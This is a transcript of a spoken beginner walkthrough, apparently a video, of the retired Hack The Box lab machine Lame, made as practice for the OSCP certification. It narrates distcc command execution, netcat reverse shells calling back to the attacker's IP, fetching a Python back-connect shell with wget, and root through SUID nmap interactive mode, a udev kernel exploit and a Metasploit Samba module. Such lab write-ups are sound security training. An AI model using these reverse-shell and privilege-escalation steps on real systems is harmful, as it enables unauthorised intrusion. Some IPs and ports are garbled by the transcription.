Hello everyone, this is Muted and Nuts. From today I'm going to be starting a new video series on Road to OSCP. So OSCP is a very difficult certification and I'm myself preparing for it. So I'm going along with the guide which everyone mentioned, like try to do more hack the box machines, vulnerable machines, and then later on take the PWK course. So before that I just want to start with hack the box, retired machines, and get things started. Like I feel confident enough, so I'll be starting with this series, and this series is mainly I'm trying to make things very simple for the end users, like even for a beginner who has no background in IT security or cyber security. So they'll be trying to understand things over here. So there are some prerequisites that you should be having some basic Linux, Windows knowledge, and network knowledge. You can find up guides on YouTube everywhere and Google as well. So I would not focus much on that. If you all have any questions or queries, you all can obviously ask in the comments. So let's get started. And first we'll be starting with Hack the Box. So Hack the Box, if you guys don't know, is vulnerable machines are present in Hack the Box, and you have vulnerable systems over there, and you can go and hack it and get the user flag as well as the root flag. User and root is basically two level of access. So basically you have a user A and you have an administrator account. So once you get access to user A, you will get the user flag. So user A is like a low privileged account, and administrator obviously has full access to the system, so that's a high privilege account, and you'll get the root flag over there. So once you reach user A, you have to somehow find some exploit or something and then reach administrator. Okay, so the thing is that we can go about with it, and we can see how things work. I know it may sound a little confusing at first because uh, even I was in the same place. I used to not understand this particularly well. Obviously, no one's born with all this knowledge. So let's get started. And Hack the Box will be starting with this particular NetSec focus list, which is mainly meant for OSCP. So I'm going to be following that. So first we'll do a Linux box, and the name of the box is lame. And before we begin, first we need to enumerate things. Okay, so you can easily do an nmap scan. Or I would recommend, since you guys would be new as well, and me myself, I'm very comfortable with this AutoRecon tool. So you can find the AutoRecon tool over here on GitHub. You can download it, and it's very easy to. You can install this particular things. It has some requirements, and once you start this using this particular tool, see, it's just as simple as running the Python script and giving the IP address. It's as simple as that. So let's get started. And if you want, I can just mention that how do you get this particular tool downloaded into your system. You can use git clone, and you can use the IP address, and then you can get it downloaded in your system. But I myself have downloaded it already, so I don't want to download it. You can just use git clone and the particular URL. Okay, so now let's start with our hack and hacking purpose. So first we will start with the enumeration. And enumeration is very important. I know many of you guys may be saying enumeration is the key, enumeration, because yes, obviously enumeration is the key because you need to find loopholes into the system. So first we need to understand why is this nmap and enumeration required. As AutoRecon is basically a tool created where it will first do an nmap scan on the important ports, and then later on it will do an nmap full scan as well. And once it finds some vulnerabilities, like suppose not vulnerability basically, but some interesting ports like port 80, which is ATP, which is port 80, and which is HTTP, sorry, which is once it finds vulnerable service, which is at HTTP, so it will try to run few more scans over there. We'll get to it later, but first we will just try to do it. Basically, I know it will be too many information to put digest or something. So let's start with AutoRecon, and we'll see what this particular tool does. So I'll just go with sudo python 3. I'm running as Kali. I'm not running as root. So this is the 2020 version that you can run. It's running as Kali by default. I don't want to run it as root. I think this is better, that you need to sudo every time you need to have a root command to be executed. Okay, so let's. So basically this is what we are going to do to run the AutoRecon scan. So I'll just explain this command quickly. What does this thing do? So first is sudo, because you need to run this in sudo because there are some UDP scans which require sudo permission, so you can only run it as root. So it's better to do it as sudo, and then you'll have Python 3. You use Python 3 to execute this because this is a Python 3, sorry, this is a Python file. AutoRecon file is a Python file over here, right here. So you need to use Python 3, and then later on you can give the path. This is directly the path for where the AutoRecon.py file is present. So basically, if you're not familiar with Linux, so in Windows you'll be having like C into program files into some tool, right? So basically it's the same thing as like home, inside home Kali, desktop and so on, and you'll find AutoRecon Pi over there. And then you give then this IP address, which is the lame's machine IP address, and we see over here in the usual, so it's mentioned that you need to give this particular IP address that is scanning the target. That's it. And we output it. We give a switch. So switches, I'm sure that most of you will be aware. So you can give a switch that is, oh, this is called a switch, and things like, when multiple commands have switches, so you can just give a switch output and you can have the output done over here. So in the HackTheBox lame folder. Okay, so once you start, so you can have it over there and then you can run the scan. I don't want to run the scan now because it will take us quite some time. So we can literally just start with normal scanning. Sorry, we can just start with our enumeration, and the file, after running the scan, we get something like this. So we have multiple scan results over here. First we can go and directly check the full TCP and map scan, and over here we'll get multiple information. So basically, as I mentioned earlier, so first it will check for this nmap scan over here. It will find port 21. So when we look at the files over here, we see that this particular TCP full scan has port 22 and port 139, 445, 3632. You can see some information given over here on the ports. Okay, so this is state, that is open. Okay, so open port means obviously we can do something, and if as long as it's not filtered ports, we cannot do things much because it's filtered from the server. And its 21 port is running FTP over here with version info given as FSTP D 2.3.4. So this particular service, I have checked it and I have seen that it is vulnerable, but somehow the Metasploit code doesn't work over here. Okay, and just another thing, that this video series we will try to avoid the usage of Metasploit because as OSCP does not allow us to use Metasploit on all the systems. Only once it can be used, so we'll try to avoid it as much as possible. But I will just show you different ways how you can execute this particular service. Not the service for say, but some other services as well using Metasploit. So FTP, you guys may be knowing that it's a file transfer protocol, and you can have files over here listed from the server and you can download things. And then we have port 139, 445 open as well. So you can just Google out different ports and you can find what the particular services do. But here we are looking at port 445. Okay, so port 445 is nothing but a Samba port, and it is the same, like you can have a Samba share and you can copy and download multiple files from there. You can access the files if you have given access. So, and we'll check out for other interesting info over here. So we find another this CCD port which is 3632. Okay, and the version number is given over here. So we will try to find vulnerabilities. So we'll just try and search for multiple versions. So we can use SearchSploit. SearchSploit tool is very useful. First thing, you find a service running on Nmap scan. You can go and use SearchSploit directly. You can use SearchSploit SMB. And then you have multiple services over here. Sorry, multiple exploits present over here. So the different exploits for different versions of SMB, you can find it all here. And if your SMB version matches, so you can just particularly copy it and then later on use it over here with the X switch. So I could not find literally SMB present. You can do it manually. You can do it manually in a different way, which we'll cover up later in the video. But then I think SMB will keep SMB aside and will try to exploit the service .cc. So, but there's nothing there on SearchSploit. So this CCCD, there's nothing present over here. So we'll do one thing, we'll just Google off and then we Google for exploit. Google is our best friend. Okay, so we see something over here, command injection, sorry, command execution. Okay, we see some Metasploit code. Let's look at that as well. We see some GitHub code as well. So this is a Metasploit code. I think it has a Metasploit module as well, and I don't think we need to go the Metasploit route. So we'll check for this Python code over here. Okay. So just to be clear, this particular code, I think it was shared after this box was released. So because the user literally came over, you can use it for this particular lame box. But yeah, it is better to do it manually rather than doing in the Metasploit way. So we have this particular code over here. We'll try to download this code in our system. Same way you can do. Get this may take some time. Okay, it's done. And we check our code over here in exploit. Okay, I have multiple things already present over here, so we will use that for later. Okay, we have this particular code over here, and we see that this particular exploit does not require any modifications, but we can just pass switches over here. So T for the target machine, the port which we are going to attack it on, and we are going to pass a command, that is netcat into this bin sh. So I'll just explain this later, and let's go and start and look how this particular service is vulnerable. So we can just rename it to something better, say like exploit.py. Okay, that sounds good. Okay, so we can just open a terminal here. You can just copy this file over here and get it, yeah. So we use this particular sign, okay, the forward slash and dot, to execute a file in Linux, just FYI. Okay, and then we have the T switch, okay, as seen in the particular script. It mentions about the T script. The usage is this way. So T, your target IP. So target IP is already same over here, that is 10.10.3. So let's use that. Let's close this. 10.10.10.3. Okay, and then we have the port. So the port is the one which is vulnerable, 3632. So we can have 3632, and then we give a command. Command is netcat. Okay, so let me tell you something about netcat. Netcat is a particular tool which will give us reverse shell. We can transfer files from that. You can Google it up for more info, but for this we will be doing a reverse shell. So basically this has command execution. So this particular script will run into the target machine. So our attack machine would be our host OS, that is this Kali Kali, and we will be executing script on our target machine, so the machine which we are going to attack, right? So that's why this particular port is, sorry, the particular IP is present and particular port is present. So we'll be using this Python script to execute things, remote command execution, because we are running the script from here and we are doing some command injection remotely to a target machine. So that is why it is called remote. It is not local. So we'll come to local command execution later, but this is remote command execution. So first we will be adding some command. Okay, instead of netcat we will just check out a command. Okay, we will just try to ping something to our particular system to see if this particular exploit works or no. Okay, so first we'll go with 10.10.14.3. Okay, because the IP address of my system over here, the attack machine is 10.10.14.13. Okay, so we will try to ping this particular service over here and see that the ping reaches over here. Okay, so let's try pinging. So we will be giving a count switch as well. So that is basically it will ping for only twice or once or whatever number you enter over here, because we don't want it to keep pinging continuously. So before you execute this particular command over here, we will try to set up a TCP dump. TCP dump is very useful because using TCP dump, we will be knowing that actually that ping is reaching to our system or no from the target system. Okay, so you can do it with Wireshark as well, but I think TCP dump is much better because you do it on the command line itself. So let's start TCP dump. I think you need sudo for that. TCP dump. Okay, and then we'll use this iSwitch because we need to only check out the files and packets which are coming in ton 0. So ton 0 is basically our tunnel 0, which we are establishing using our HackTheBox VPN. So we'll be using ton 0 and we'll only look for ICMP packets. So if you guys don't know, the ping which we do sends ICMP packet. It doesn't send TCP packet, so it sends ICMP packet. I'll just enter my Kali password. Okay. Okay, I need to re-enter it again. Oh, come on. Okay, so we are having something over here, but for now there's nothing. So let's try to ping this particular system, like our system. So basically, just to explain it again, we are trying to do a remote command execution. So from this, we will try to execute some command in our target machine, and from target machine, this particular ping should reach our attack machine. This is our attack machine. This is sniffing things over here. It's sniffing for packets. So let's see if we capture anything away. If we capture things away, that means our remote command execution is working. That means we can try and possibly execute multiple things on our remote system. So let's try this now. Okay, for some reason, okay, it should work now. Okay, so I don't really have the permissions for set right for this particular thing, so I'll just sudo chmod. So chmod is basically changing the permissions of the files, and I will just use for this case 777. So 7 first. So it's basically you can go and check out on permissions. And just to explain it quickly, 7 means give all access, read, write, and execute. And so the first 7 is for the particular owner which is present. So the second owner, which will be a group or the actual owner, and the third one is others. So there are multiple control groups. So you all can just check it out on Google as well because it's a long thing to explain. So if you all are stuck up, you all need some help on that, then drop it in the comments. I'll help you all understand it better. Okay, so we can do chmod 777 and a file, and this is done successfully. So now we see that this particular system, we have our Python script ready. Sorry, we have read, write, execute for all. So first user is Kali, as I mentioned before, second is Kali as well, and third is others. Okay, so let's just clear this and try to execute a command again. See, we get some packets. So that means our particular remote code execution is successful, because see, if we look closely over here, we are getting a connection from 10.10.10.3, that is our target machine, and we are reaching the attack machine, that is our system. So we are getting a echo request over here, and this is a echo reply which we give back. So this is the 2. We set the count as 2 over here, right? It's 2 over here, so that's why it sends it twice and it doesn't send anymore. So that means remote command execution is successful. So now we'll just close TCP dump. We'll particularly add a reverse shell now. So now for adding a reverse shell, first we'll actually need a listener. We'll need a listener present over here. So we'll use netcat. So netcat, this is NVLP. So listening and verbose and port. So you can check out and help. I can just show you quickly. So the N switch would give you all numeric IP address only. You don't have to enter any domain name, and you use L. L is for listening mode. So that means you're listening for some connection on Nmap. Sorry, on NC. Not cat. I'm sorry. And we are specifying a port. So that is P. So we will give the port number later. And as well as V. V is for verbose. That you can see multiple things over here. So we actually had V. So just clear this off. NC NVLP 4444. Okay. So 4444 is the port switch. Okay, so we have given a port switch over here. So we'll be listening at port 444 on our system. So we'll just start this netcat. Okay, and now we'll come back over here. So this particular things, we are using two terminals side by side. Okay, so now we'll be needing a remote code execution over here. So now we will be doing an NC. We'll try to use IP address only and verbose to 10.10.14.13 and the port 4444. So netcat has this functionality where we'll use netcat. We will use a numeric IP address only, and we will use verbose, and we will give the IP address of our attack machine. So same thing as in ping, we are giving some execution code. So it needs the command, the netcat connection should reach to our target system, right? So we need to specify this particular IP address because same thing we had specified over here. So we need to specify this, and we specify the port number as well. So port is 4444. So once you have this particular port present, we can particularly listen over here, and then it will catch this connection will be caught over here. Okay, so let's just see it. And now we need to provide a E switch as well, because once you get the netcat connection, you need to have a particular command, like in Windows we have CMD. Okay, I just pressed enter very quickly. Okay, but let me explain. In Windows we have CMD. So over here we need to have a bin bash shell. So in order to get this bin bash, so but particularly commands which we are executing over here like ls or something like that, so this all are done from bin bash or bin sh. So that's why we are providing an E switch. So that means this whole command means that netcat send a connection to a particular IP address that is our attack machine, which is our this current machine, with port 444. So we have a listener listening over here. So, and we need to send a bin bash. So we are sending a bash shell. So that means we are sending some command line. So we can actually execute things, whatever we execute over here would go into the remote machine. That is, the remote machine is the target machine, and it will execute commands over there, and it will send back the response. Okay, so I just pressed enter in a hurry. So this is what it will look like after pressing enter, and we have a connection from here. So let's just see if this thing actually worked. First thing you can do is, whenever you get a shell, is you can do who am I, or you can do ifconfig. So let's do who am I and check. Okay, so we are daemon, we are some user over there, and let's just check ifconfig. Yeah, we have got the IP address over here. So you can check IP address from here as well, but I'm just saying, just to be sure, you can check it from here as well. Okay, so now we are a user daemon, and we are okay. Let's just check which folders we have access to first, because this looks like a low level user. So let's just check. Okay, we are somewhere in some directory. So we can use lsla to display the files present in that particular directory, and we can use the switch LA to display the hidden files as well. So let's just check which directory. Okay, we are in temp right now. So this shell is good, but I want to show you guys how to upgrade to a better shell, or better Python shell. and we can do that very soon. I just want to show you guys because it helped me a lot as well to upgrade the shell. Like when I started watching videos earlier, there were like IPSec had recommended that you use Python shell, so you have to upgrade your shell. So I'll just come to that. First we'll upgrade our shell, then we'll look more into the system because it will be better to use. Okay, so now first thing we do is we try to upgrade our shell. What we'll do is basically we'll start with uploading some file into the remote system. Okay, so now since we are in the system over here, okay, on the right side terminal, you can see that we are into the system. So we need to upload some file over there which will send us some connection to our particular system, like same as this netcat, but we'll upload a file, we'll get a better shell over there. I'll just show you how to do that. Okay, so before that we'll just quickly go and check for this GitHub website. You can download the shells from here, Python shells. So one which we'll be using is the TCP one, TCP PTY back connect, and the TCP PTY shell handler. So I'll just tell you what these two files do basically. Okay, first I already have the two files, TCP shell handler and TCP backdoor. I've just renamed it for better usage to make it things easy. Okay, so now this particular file, you don't need to know much about things. You just need to change few parameters over here. So already you have things mentioned over here, like change me. So these are the two fields which you want to check and change. So first is your L host. L host is your listening host. So that is your attack machine, the which Kali system I'm running on. So it needs my particular IP address. So our IP address over here is 10.10.14.13 and it needs L port. So the port which will be listening on. So the netcat connection. So now since netcat is using port 4444, so the port is already in use, so we don't need to use the same port again because we'll not be successful with that. So we use a different port, that is 45555. Okay, so we'll use this particular port, we'll use this particular IP address because that's our system's IP address right now, and we just save it. That's it. We don't do anything else, we just save it. Okay, for now, see, you don't need to understand multiple things on this. We can check it out later, whatever the things you do, and you can probably Google out for what this particular commands do, like socket and connect. Okay, so this basically connect function will send this particular IP address to lhost over here and this particular port over here. Okay, so let's go next. So TCP shell handler, we don't need to do anything over here. We'll leave it as it is. We don't need to add any information over here. So I'll just show you how to start and execute things. So first, in order to send a file to a remote system from attack machine. Okay, now I'll just say attack machine and a target machine. So a target is the lame box and our attack machine is our system which we are working on. So in order to particularly send a particular file to a target machine, we would require certain things to be done. So simple basic thing is we can use the wget command. Okay, so we can send files from our system to the particular system. Targets. We can even use netcat, but I just want to show you guys how to do it using wget because we will be using an HTTP server as well over here. So things to learn more, because netcat also you can do it. Maybe in the coming videos we'll do it using netcat, but for now I want you all to do it from wget. So wget is basically you use a wget command, okay, and you specify your particular IP address, that is 10.10.14.13. This is the IP address of our attack machine because we are getting, so now see, this right terminal is the target machine. So we are getting few things from our system to their, sorry, from the attack machine to the target system. So we'll be using the target machine's IP, plus we'll be using the port 8000. I'll show you why. Because this particular port is where our HTTP server will be hosted. So we'll host an HTTP server now, so that we can do it as Python 3, and we can use the M switch, that is a module switch, and that is HTTP server, and we will be running it on port 8000. Okay, so we just press enter, that's it. So we are running an HTTP server on port 8000. That means we can use HTTP, we can use wget commands, or we can use different commands like wget in Linux, and in Windows you can use the download string function, and you can get this particular file using HTTP. So I'll just show you how it can be done. So now, okay, you need to get back. Okay, so we will check for the name. The name of that particular file was tcp back.py. Okay, so tcp back.py. Okay, and we will output it to a file called dev shm. So we could just create a folder dev shm, okay, in our particular target machine, and we save this particular file. So we'll just save it as backdoor. We'll just keep it short, bd and py. Okay, so we'll keep it as bd py. And we'll press enter, and once we press enter, so basically this command will get the file from here, that is us HTTP server running over here, and it will save to this particular .bd.py file. Okay, so let's press enter. See, we already have a get request coming over here, get tcp backdoor.py, and it is successful. 200 request means it is successful. So it is successful. Now let's go and check in our dev shm folder that if the files are present or no. So we just cd into it, or we can just lsla directly and give the directory name. But I just wanted to go into the folder. So let's go. So we do lsla, and we see that this particular file is come and present over here. And actually, before going to this, we could actually just check for locate Python, and we see that Python is installed over here. Locate Python, basically it does is that it lists down if this particular file name exists into the system. So we see that Python is present. So actually we should have done the check before this to know that we can execute the Python script or no. But yes, we can execute the Python script. So we just lsla again, and we have this particular bd script present over here waiting to be executed. Okay, so I don't think we need the HTTP server now. So we can just close this, and we particularly we need the TCP handler to be running. Okay, so TCP shell handler to be running. Okay, so we do is Python TCP shell handler dot py. Okay, yeah, sorry. So we need to run this, and we need to provide the switch B, so because we are binding it to, and we will be using our host IP. So that is our attack machine IP, that is 13, and we will be giving the port, that is 5555. This 555 port we have mentioned it in our BD file as well, right? So we will be giving this particular port, and we will be listening. We are waiting for this shell, so we'll execute this particular file. So before executing this, we'll just cat bd.py. See, and this is our shell which we have mentioned over here, 14.35555. Okay, so we'll just run this particular command. So Python bd.py, and we have a shell as daemon. So this shell is much better, and in this you all probably learned about how to file transfer using wget and HTTP. So that's how, so we can just execute commands over here, view my daemon. Okay, lsla. Okay, fine. So we have this particular good shell over here. I don't think we require this shell anymore. So we can probably just close this particular shell. You can just Control C. Okay, so now we have few things over here. Okay, so now let's get started with just enumerating things and checking multiple things you can check over. But for now, just to make it simple and beginner friendly, we will try to upload another file, which is, okay, before going to that, so now we are into the system. We will be looking for our user flag, right? Because first, as soon we have access to our system, so we need to get the user flag. So let's check if that we have a user flag. User flags are basically in home folder, into some users folder. Okay, so home folders is whichever user you are particularly running into the system. Every user will be having a home folder. So we will be checking our home folder over here. So our home folder is present, and it is, we don't have, okay, daemon is an underprivileged user, okay, and it doesn't have a home folder. So you can read about daemon folder that it is underprivileged user under a user. So just look that we have access to read access to this particular folders over here. Read. So we can just, because we don't belong to Marcus, so we don't have read write execute. So we don't belong to Marcus again, so we don't have read and execute. We belong to this particular category, which is others. So that is read and execute only. Okay, so just let's just go and check. So we go and check Marcus. Actually, see, the thing is, I've already solved this box. I know the user text is under Marcus, so you can particularly go and enumerate and find things over here as well in FTP, Marcus, service, and user. You can go and check those folders as well. So now we go into Marcus and we see our user flag over here, and it is very much readable. So we can just go cat and read the user flag. I didn't want to do that. So yeah, you can just basically do it, and we have our user flag. So we check for multiple things over here. Sudo as admin successful, but I could not find any much information. So I don't want to stress much over here. So we'll just go and basically try to download a file again, which is Enum. So that basically file will try to enumerate things and list out misconfigurations plus interesting information present in our particular target system. So we'll do that the same way. We'll use an HTTP method. We'll set up a HTTP server. So 888. Okay, we can just give it 888. Okay, we are listening, and we will have this particular Linum message. So you can particularly Google for this Linum, and what this basically will do is this particular file, sorry, this particular file will enumerate things and it will check for some interesting information, and it can give us hints how to privilege escalate this particular user. Okay, so now we are in home Marcus, and we will check. Yeah, so we will just cd back to our dev shm directory. Okay, lsla. So we still have the bd file, so we'll use the wget command. We'll use the same 888 this time because our port we are running is 888, and we will get the lin, you know, sh. Okay, and we'll output it to uh, dev shm. Dev shm, and the file name we'll just give it as, we'll make it a hidden file. We are making it as a hidden file, and sh. Okay, lesh. Okay, so the transfer is completed. Let's just check lsla, and we have the file present over here. So what we'll do is we'll basically just run this file. So we can just run it using this. Okay, so we need to just give chmod to execute files over here. Chmod. Okay, 700,770. Okay. Sorry, I forgot to enter the file name. My bad. Okay, so we have done chmod, and then now we try to execute this particular command. So the privilege escalation script, sorry, enumeration works. Let's wait for it. It may take some time. Okay, the scan is completed. Let's check for some interesting information over here. Okay, I think I've gone way above. Okay. Okay. So we see something, and we have the Linux version, kernel version over here. So we'll just copy and paste things over here in cherry tree. So cherry tree, we can actually write notes over here. So I'll just be using this cherry tree over here. So Linux version, and okay. So we'll be having cherry tree done over there, and then we'll be searching for multiple other information. We have a logged in from a user root Marcus. Actually, this is not beneficial in this particular box. I don't know if there are other ways to exploit using Marcus, but I could not find a way to exploit using a Marcus, so we'll leave that aside for now. There are multiple groups present over here. It gives information about a group, the password file, sorry, passwd file. So there are users present over here. Super user recently used sudo. This also I checked it earlier, but it didn't seem to be useful. So we check more things. Nothing much over here. We check all the services processes running. So now we check for, yeah. We check for few SUID files. So this thing is interesting over here. So the thing is, I've already spent multiple, like, lots of time checking out for things over here, like, root, daemon, or something like that. But I literally, in the end, I found something like this particular Nmap version has a SUID set to it. Okay, so this particular file we can use SUID. So this SUID basically means a set owner user ID. So what this basically does is, to explain quickly, so now once we execute nmap, now we are logged in as user daemon. Okay, so we are logged in as user daemon, but the owner of this particular service, this particular application is root. So the SUID is present over here. RWS. Okay, so SUID is present. That means when we execute this particular application as daemon user, because of this SUID present over here, we will be executing this application as the owner of the file. The owner of the file is root. File is an application. So nmap's owner is root. So when a user daemon executes this particular file, this will be executed as root because of this S over here, the SUID files. Okay, so now let's try and execute this and see how it can be helpful. Okay, so we will just, okay, we'll just copy that particular thing. Okay, we will use this, and we will try to Google first, and I'll just show you this. So let's just look and read through this Nmap Interactive. So earlier versions of Nmap had a particular switch called Interactive. So what it basically did was it opened a command line kind of a interface. So Nmap Interactive, it gives you a command line, so you can check for multiple things over. So older versions used to have this. Okay, the version from 2.02 to 5.21 had this particular interactive feature. So this Nmap Interactive gave a command line execution kind of a thing. So let's try to use this and exploit the system now. Okay. So you can read more over here in this pentest blog. I'll just go over. So we'll just look at it. We'll go user bin nmap, and as mentioned earlier, we'll look over here for the exploit privilege escalation. We'll just try to Google nmap privilege escalation, and we find something over here. Let's look at it. There are multiple ways to use it, but we will probably look at this nmap interactive way. Okay, so nmap interactive is nothing but it will give a command line, and you will use that to particularly exploit multiple things. So you can actually run this particular thing command line as root, and we will just look at it. So we have Nmap, and we'll use the interactive. Okay, let's use. Okay, we have something over here. So let's just use help. You can press H maybe. So let's use help and see what kind of commands we can execute over here. Okay, so we can run this particular thing is very interesting over here. Runs a shell command given in the foreground. Okay, so that is using this exclamatory mark, we can run a shell command. Shell command is that is your probably your command line commands, the normal things which we use over here. Okay, we'll just close this. It can execute those particular things in on this particular nmap command line. So let's just quickly go and execute things, the shell commands, right? So we'll just use the exclamatory switch, and we will try just type who am I, and it literally says root over here. So that means we have system access, so we can do multiple things present over here. So we can basically do is who am I. So okay, so nmap command line works a little different, and I think it doesn't like backspaces. So we'll just be careful and try to get the root flag over here. So the root flag is basically you can get it using it's present in the root directory and in root text. So we'll just do it as, okay, again it doesn't like backspaces, so cat, that is root root.txt. Okay, so once we do this, probably we get our root flag. Let's look, and we have a root flag over here. We have a root flag. So this particular root flag, we have found the root flag, and yes, so that means we can execute commands in as root over here, and that's how we get our root flag. Okay, so this is one way of executing and getting root access by manually doing it from the CC and doing the nmap and getting the root access. So another thing I would like to mention is the one with SQL. Okay, I think. So now coming to another interesting information which we captured earlier was Linux version 2.6.24. Okay, so let's quickly Google on that, and we will just check. Okay, we have this, we use this particular CV number. Okay, so I have tried multiple exploits. We just initially, if you just want to go, you can go as Linux 2.6 exploits, and then it will list multiple exploits present over here in exploit DB. So exploit DB is nothing but an exploit database where all the exploits are present, but multiple things are present over here, but somehow things didn't work. So what worked was this particular exploit. Okay, so this particular exploit over here, udev. Okay, so I'll just explain it later how to particularly use it. So we go through the exploit. This is written in C, as you can mention over here, as you can see it over here. And we don't need to go much on the nitty-gritties over here, like what this code is actually doing. Like the code basically does. Okay, so the usage over here is written that you need to pass the process ID or the UDVD netlink socket. Okay, you don't need to stress much on this particular word. We'll look into it what it is. Okay, so you can just see that it is present over here. Usually it is -1, and the exploit will execute temp root. So throw whatever payload you want there. So basically, you just don't need a lot of information on what this particular code is doing, what this particular code line is. What you need to know is what this exploit basically does. So this exploit basically what it is doing is, once you run this exploit, so whichever file is present in our tmp folder, okay, so tmp folder and a file name run, so whichever the file name run, we have to create a file name run where we will enter a malicious reverse shell code, and we will save it in temp folder. So what this, in short, what this would do is, once we run the kernel exploit, this particular exploit will basically run this particular file in temp folder as root. Okay, so as root, so we can directly give a reverse shell over there, and that will particularly run as root. So that's how we'll get a root web shell, sorry, root reverse shell. And let's copy this particular thing. And I've already saved this particular exploit over here. We don't need to modify anything over here. We'll just use it as it is. So what we'll do is we have this kernel.c over here. So again, we need to file transfer. So we will be using our HTTP server, and we will be using wget routine. Oops, it's 8888. Okay, then it is kernel.c and output it to dev shm and kernel.c. Okay, so we'll output the file over here. We'll get it. Okay, so we got the file already, and we can lsla and check kernel.c. Now with the C file, the thing is you need to compile the file first. Okay, in order to execute and run it, you need to compile the file. So in order to compile the file, we will be using GCC application. Okay, GCC is used for compiling C files. So we will use GCC. We will compile the file. Compiling the file is very much required in C because you can check about compiling more on Google, but you need to actually compile that particular file. Then only you can execute that particular C file. Okay, so we need to compile it. Kernel.c. Oh, and so what we are doing is we are calling the application GCC. We are providing this kernel.c file which we have downloaded just now, and we after compiling the output of the file we would be giving that. So output would be okay, kernel itself. That's it. So I think it's done. So let's check. So we have our kernel file present over here. So that means it has compiled successfully. It didn't give any errors or anything. So we can use this properly. So now when we go back to the exploit, we can check the exploit will run execute anything in the temp folder as anything in the temp folder with the file name run. So anything as in you can add a reverse shell over there. So what we'll basically do is pass the PID of the network links. Okay. So we need to pass in the PID in order for this particular exploit to work. So we can just check this. We'll just copy paste. As simple as that. And we can just check the contents of this particular file. So we just use cat and the link. Okay, and we find that we have this PID present over here. There's only one PID present, there are multiple lines, I'm aware of that, but there's only one PID present. So let's just quickly copy this into a cherry tree. Okay, PID number. Okay, so we have the PID number. And over here it mentioned listed in PID, usually is in the UDF. So we will have another method done over here which will be using ps aux grep ud evd. So grep ud evd will get it from here. Basically it's mentioned over here ud evd. So we'll just check for a process that is grep ud evd, and we have ps aux grep ud evd, and let's check what it returns. So it returns a process ID over here which is 2688, and as mentioned over here it is mentioned usually the UDV ID PID -1. So this particular the PID over here is usually PID -1. So if we look over here, this is 2688. So -1 is 2687. So this is the PID which we are looking for. So basically in short we'll just use this particular PID number along with our kernel file over here in order to execute the exploit. But before that we need to set up our reverse shell. So what we'll do is first we'll again have the netcat listener nvlp 44444 like mentioned earlier. Okay, so now we will create a new file which will be our netcat listener. So we'll just create a run file. Sorry, we'll create a new reverse shell file as root. Sorry, as run. So we will just echo and we'll add in few parameters. We'll create a bash file. So this particular we are creating a bash file, so that particular file should know that we are creating a bash file. So we'll just echo this into run. So what we are basically doing is we are echoing. So echo is basically used to somewhat like print. So if we echo this particular thing and we don't add this particular section, it will actually echo this particular message over here. it will just echo it. It will not execute anything. So what we are doing now is we are echoing this particular script line into a file name run. So this is, we are using this switch to create a file and save it as run. Okay, so we are doing that. So we're just echoing over here. So okay, before that, let's just quickly, okay, so let's go to temp directly, and we actually created from here as well, and we can give the directory as temp run. But to make things easier, we'll just go to cd temp lsla. We already have some files present over here, so we'll just do the echo script. Yeah. So bin bash, okay, and the first line of the bash scripts usually is this, because we need to call a bash, we need to execute that file using bash, so we'll just leave it as it is. We'll not add anything more, so we'll just save it as run. Okay, and then we'll just quickly check that did it create a file name run. So it created a file name run. So we'll cat the run file. That means it will open the run file and see that that particular command got saved in the run file or no. So yes, it has got saved. So now what we'll do is we'll add another line for our netcat. So we will do is echo and nc nv 10.10.14.13 on port 4444, because here we are mentioned as 444. Okay, and we will give the e switch to give us a bin bash shell. Okay, this we will, now we will not create a file as this. We will not do this because we need to append it. We already have this first line, right? We don't want to overwrite it. If we use this particular thing and we do run, so it will create a new file and it will overwrite this particular file over here. So now we need to append it. So I'll just show you all what I mean. So I'll append it using this particular two arrows, and we'll save it and run. So I'll just show what it basically does. So now once you do cat run, you will see that it has two lines present. So first it was this, and then we added another line which we have appended it. That means we have added it to this. We have not overwritten this line. Okay, so now we will quickly just check LSL. Okay, so what we'll do is we need to run our kernel exploit. Okay, to make things easier again, we will just directly go to dev shm and okay, we'll just go to the directory first and ls la. Okay, so we have the kernel file present over here. We'll just execute the kernel file. We have a listener listening. Keep this listening over here. We have the kernel file. We'll pass in the PID which was found over here, 2687. Let's pass the PID. Okay, let's see. Let's hit enter and let's see what happens. We have a connection over here. So we have a connection. Let's see who are we as. We are as root. Okay, so that's basically how we do this particular privilege escalation using two different ways. Okay, and I don't want to spend more time on Metasploit exploit, because you can actually do it using Samba. So if you see the port over here which is present 445, this is also vulnerable. You can use user map Samba script, and you just need to enter the rhost and you can do it. I just don't want to go along with that way, but then I'll just show it to you how simple it is. Okay, we'll just exit through this. We don't need this anymore. Okay, and now just fire up MSF console. Take some time to start. Okay, so let's just search for SMB user map, because when you check for Google for this particular version present over here, it will give you SMBD3. It will give you this particular exploit. So this is vulnerable to this particular exploit. So you can just use it. Okay. Options. Okay, so we need to put the our host path. So our host is basically your remote host, and we need to set the IP address of that in Nmap. So we can just do it as our host and the IP address, that is 10.10.10.10.3. That's it, and the port 139. We need that particular port to in order to execute this exploit. So yep. So we just, as simple as I just set the R host and click exploit. We get a connection, shell, who am I, we are root. It's that simple as that. So we don't recommend this because I don't recommend this. We can do this in for particular things, and OSCP gives you one try on Metasploit that you can use it for one system. But I don't recommend this because you don't get to learn a lot, and during manual ways you get to learn a lot and execute things differently. Okay, so that's it for today. And thanks a lot everybody for watching. And yeah, hopefully we get back soon. And if you like the video, kindly subscribe. If you all have any queries or questions, you all can drop it in the comment section. And if you all have some suggestions as well that I can do things differently, do drop it in the comments below. Okay, thanks a lot.